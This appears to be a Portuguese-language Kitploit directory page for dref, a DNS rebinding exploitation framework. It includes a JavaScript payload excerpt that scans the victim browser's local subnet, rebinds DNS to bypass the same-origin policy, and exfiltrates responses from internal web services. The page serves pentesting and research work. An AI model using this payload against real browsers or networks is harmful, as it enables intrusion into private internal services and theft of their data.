Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
dref — Framework de Exploração de Rebind de DNS | Kitploit
Ferramentas/GitHubGitHub/reverseclabs/dref
Segurança IoTExploraçãoSegurança WebTestes de PenetraçãoRed TeamingAnálise de DNS
GitHubreverseclabs/dref

dref

Framework de Exploração de Rebind de DNS

Ver Repositório
49471há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Estrutura de Exploração de DNS Rebinding

Este projeto não é mais mantido.

dref faz o trabalho pesado para o DNS rebinding. O trecho a seguir de um de seus payloads integrados mostra a estrutura sendo usada para escanear uma sub-rede local a partir de um navegador comprometido; após identificar serviços web ativos, ele procede a exfiltrar respostas GET, passando facilmente pela política de mesma origem:

root@kitploit:~
// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if (p.open) session.createRebindFrame(h.host, p.port)
      }
    }
  })
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})
      }
    })
  })
}










Vá para a Wiki para começar ou confira o dref atacando navegadores headless para um caso de uso prático.

Esta é uma versão de desenvolvimento - não use em produção

Baixar ferramenta